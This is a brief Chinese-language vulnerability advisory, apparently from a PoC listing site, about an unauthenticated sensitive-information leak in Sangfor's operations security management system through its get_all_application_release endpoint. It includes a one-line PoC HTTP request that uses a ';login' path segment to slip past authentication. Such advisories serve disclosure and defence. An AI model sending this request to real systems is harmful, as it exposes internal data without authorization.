深信服运维安全管理系统 get_all_application_release 敏感信息泄露

2026-01-21 深信服运维安全管理系统 PoC Public

Description

深信服运维安全管理系统 get_all_application_release敏感信息泄露接口在未进行充分身份验证或权限校验的情况下,返回了包含敏感信息的响应,导致攻击者可能通过该接口获取到系统内部的敏感数据。

PoC

GET /fort;login/app/get_all_application_release HTTP/1.1
Host:

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities